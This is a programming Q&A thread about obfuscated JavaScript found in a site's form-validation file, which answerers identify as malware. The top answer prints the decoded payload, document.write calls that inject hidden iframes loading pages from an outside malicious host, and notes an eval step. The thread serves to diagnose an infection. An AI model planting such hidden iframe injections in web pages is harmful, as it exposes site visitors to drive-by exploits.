# What is this strange code found in my javascript file?

Tags: javascript, virus

One of my form validating files, I found the following code (see below)
My friend pointed it out when he scanned my site, says it's a virus.

But what is it exactly?

http://pastebin.com/P8KBm0xk

Comment: @JaredFarrish, the posted link is to **pastebin**, not the website that could be infected.

Comment: @arttronics - Go for it. (And yes, I know what pastebin is.)

Comment: Your comments are not constructive Jared. The OP did not post a link to an infected website, but provided what he see's in a pastebin file to analyze.

Answer (score 5):

A kind of virus. I contains some strings with Unicode-escaped characters in an array literal, the first beeing some html and the second `"write"`. Then, `document[arr[1]](arr[0])` is executed, which translates to the following:

```
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
```

I don't know (and won't inspect) what these iframes include, there will probably be some exploit.

Also, the code does contain (between these two iframe-writes) some functions (`_1lO` and `O0l`) which probably unescapes the `IlO` string before it is `eval`ed (yes, eval is evil! :-), but there is some missing code in front of your pastebin snippet, so I won't be able to tell you what they exactly do. Can you give us the whole script?

Comment: You can look to see if the link is known or suspected malware. For instance: http://www.google.com/safebrowsing/diagnostic?site=mazda.georgewkohn.com

Comment: **+1** Excellent answer Bergi. Also, excellent comment Jarred! **+1** and thanks!

Comment: There is a way to inspect what the payload is, but for the life of me I can't remember the site that does that.

Comment: Jared, maybe that service is listed on [**this page**](http://cleanbytes.net/malware-online-scanners)

Comment: @Bergi—There is nothing "evil" about the use of eval here. It just allows the code to be a string in an array. It could just as easily been written without eval and been obfuscated in a similar way.

Comment: @RobG: Yes, sure; that was only a joke - often the use of eval is considered evil, but here it is used to execute evil code :-)

Answer (score 3):

This is an obfuscated virus. Somewhere with all that stuff will be an eval(). If you want to know what it exactly does, you will have to decode the parts and see.

Much more interesting will be, how the stuff ended up in your code.